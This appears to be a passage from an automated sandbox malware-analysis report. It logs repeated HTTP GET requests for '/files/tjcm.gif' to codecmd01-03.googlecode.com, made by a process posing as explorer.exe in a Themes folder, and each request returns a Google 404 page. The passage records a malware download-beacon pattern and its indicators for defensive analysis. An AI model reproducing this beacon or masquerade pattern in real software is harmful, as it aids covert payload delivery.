                                              Sep 30, 2024 16:09:36.444355011 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.2.651210142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:36.872118950 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:37.557198048 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:37 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:37.557219982 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.2.651211172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:38.331767082 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:38.889147043 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:38 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:38.889306068 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.2.651212108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:39.217927933 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:39.923654079 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:39 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:39.923677921 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              62192.168.2.651213142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:40.236049891 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:40.962721109 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:40 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:40.962739944 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              63192.168.2.651214172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:41.387087107 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:41.957453012 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:41 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:41.957556009 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              64192.168.2.651215108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:42.509047031 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:43.285384893 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:43 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:43.285547018 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:43.285557985 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              65192.168.2.65121664.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:43.602869034 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:44.311474085 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:44 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:44.311499119 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
